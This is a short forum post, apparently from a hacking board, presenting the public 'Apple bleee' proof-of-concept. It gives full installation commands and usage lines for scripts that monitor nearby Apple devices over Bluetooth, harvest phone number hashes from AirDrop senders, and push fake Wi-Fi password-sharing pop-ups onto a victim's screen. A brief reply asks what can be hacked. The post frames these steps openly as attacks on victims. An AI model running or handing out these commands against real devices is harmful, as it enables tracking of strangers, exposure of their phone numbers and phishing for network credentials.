JtL

JtL

Participant
Статус
Offline
Joined
5/29/20
Messages
14
Reaction score
0
In this post, we will look at an Apple hacking tool.

? Apple bleee is an experimental PoC that shows what an attacker gets from Apple devices if they intercept Bluetooth traffic.

Installation

Python:
apt update && apt upgrade -y
sudo apt-get install git
git clone https://github.com/hexway/apple_bleee.git
cd ./apple_bleee
sudo apt install -y bluez libpcap-dev libev-dev libnl-3-dev libnl-genl-3-dev libnl-route-3-dev cmake libbluetooth-dev
sudo pip3 install -r requirements.txt
git clone https://github.com/seemoo-lab/owl.git && cd ./owl && git submodule update --init && mkdir build && cd build && cmake .. && make && sudo make install && cd ../ ..

Before you start using the tool, you will need a Bluetooth adapter for sending BLE messages and a WiFi card that supports active monitoring mode.

Apple device monitoring

Using ble_read_state.py, an attacker can monitor traffic and the script will display messages about the state of Apple devices. Additionally, the tool detects password sharing requests from Apple devices.

Python:
ble_read_state.py [-h] [-c] [-n] [-r] [-l] [-s] [-m] [-a] [-t]

To monitor, enter the command without parameters:

Python:
sudo python3 ble_read_state.py

Getting a mobile phone number

The airdrop_leak.py script allows you to get the mobile phone number of any user who tries to send a file via AirDrop.

Python:
sudo iwconfig wlan0 mode monitor && sudo ip link set wlan0 up && sudo owl-i wlan0-N

To obtain the hash of the phone number and the IPv6 address of the sender, run the script without any parameters:

Python:
sudo python3 airdrop_leak.py

We display a message on the victim’s screen

The adv_wifi.py script sends BLE messages requesting the exchange of passwords over Wi-Fi. Using this script, an attacker can trigger a pop-up message on the target device by knowing the victim's phone or email.

To request a password via Wi-Fi, we will need to provide any contact (email or phone number) that exists in the victim's contacts and the SSID of the Wi-Fi network that the victim knows:

Python:
sudo python3 adv_wifi.py -e <email> -s <access point SSID>
 

Gamma

Gamma

Participant
Статус
Offline
Joined
5/24/20
Messages
7
Reaction score
0
what exactly can be hacked this way?
 
Top